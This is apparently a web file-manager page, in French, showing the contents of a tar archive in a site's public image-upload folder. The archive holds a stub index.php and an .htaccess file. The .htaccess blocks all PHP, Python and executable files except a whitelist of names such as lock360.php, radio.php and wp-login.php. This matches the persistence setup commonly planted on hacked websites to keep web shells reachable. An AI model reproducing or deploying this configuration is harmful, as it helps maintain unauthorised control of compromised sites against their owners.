Gestionnaire de fichiers - Editer - /home/par6413/public_html/images/upload/modul.tar
Arrière
Slider_v1/index.php 0000644 00000000027 15063721500 0010212 0 ustar 00 <?php echo "index.php"; Slider_v1/.htaccess 0000644 00000000644 15063721500 0010175 0 ustar 00 <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>